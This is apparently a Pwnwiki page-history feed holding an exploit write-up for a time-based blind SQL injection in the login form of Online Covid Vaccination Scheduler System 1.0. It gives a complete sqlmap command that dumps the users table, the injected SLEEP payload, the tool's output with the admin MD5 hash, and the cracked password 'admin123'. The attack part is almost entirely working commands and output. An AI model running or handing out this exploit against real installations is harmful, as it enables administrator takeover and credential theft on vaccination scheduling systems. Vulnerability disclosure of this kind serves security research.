https://pwnwiki.com/index.php?action=history&feed=atom&title=Online_Covid_Vaccination_Scheduler_System_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E
Online Covid Vaccination Scheduler System 1.0 SQL注入漏洞 - Revision history
2026-04-09T01:38:07Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=Online_Covid_Vaccination_Scheduler_System_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&diff=6463&oldid=prev
Pwnwiki: Created page with "<pre> # Exploit Title: Online Covid Vaccination Scheduler System 1.0 - 'username' time-based blind SQL Injection # Date: 2021-07-07 # Exploit Author: faisalfs10x (https://gith..."
2021-07-08T06:02:22Z
<p>Created page with "<pre> # Exploit Title: Online Covid Vaccination Scheduler System 1.0 - 'username' time-based blind SQL Injection # Date: 2021-07-07 # Exploit Author: faisalfs10x (https://gith..."</p>
<p><b>New page</b></p><div><pre><br />
# Exploit Title: Online Covid Vaccination Scheduler System 1.0 - 'username' time-based blind SQL Injection<br />
# Date: 2021-07-07<br />
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)<br />
# Vendor Homepage: https://www.sourcecodester.com/<br />
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scheduler.zip<br />
# Version: 1.0<br />
# Tested on: Windows 10, XAMPP<br />
<br />
<br />
################<br />
# Description #<br />
################<br />
<br />
The admin panel login can be assessed at http://{ip}/scheduler/admin/login.php. The username parameter is vulnerable to time-based SQL injection.<br />
Upon successful dumping the admin password hash, we can decrypt and obtain the plain-text password. Hence, we could authenticate as Administrator.<br />
<br />
<br />
###########<br />
# PoC #<br />
###########<br />
<br />
Run sqlmap to dump username and password:<br />
<br />
$ sqlmap -u "http://localhost/scheduler/classes/Login.php?f=login" --data="username=admin&password=blabla" --cookie="PHPSESSID=n3to3djqetf42c2e7l257kspi5" --batch --answers="crack=N,dict=N,continue=Y,quit=N" -D scheduler -T users -C username,password --dump<br />
<br />
<br />
###########<br />
# Output #<br />
###########<br />
<br />
Parameter: username (POST)<br />
Type: time-based blind<br />
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br />
Payload: username=admin' AND (SELECT 7551 FROM (SELECT(SLEEP(5)))QOUn) AND 'MOUZ'='MOUZ&password=blabla<br />
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])<br />
<br />
web server operating system: Windows<br />
web application technology: PHP 5.6.24, Apache 2.4.23<br />
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)<br />
current database: 'scheduler'<br />
<br />
Database: scheduler<br />
Table: users<br />
[1 entry]<br />
+----------+----------------------------------+<br />
| username | password |<br />
+----------+----------------------------------+<br />
| admin | 0192023a7bbd73250516f069df18b500 |<br />
+----------+----------------------------------+<br />
<br />
<br />
The password is based on PHP md5() function. So, MD5 reverse for 0192023a7bbd73250516f069df18b500 is admin123<br />
</pre></div>
Pwnwiki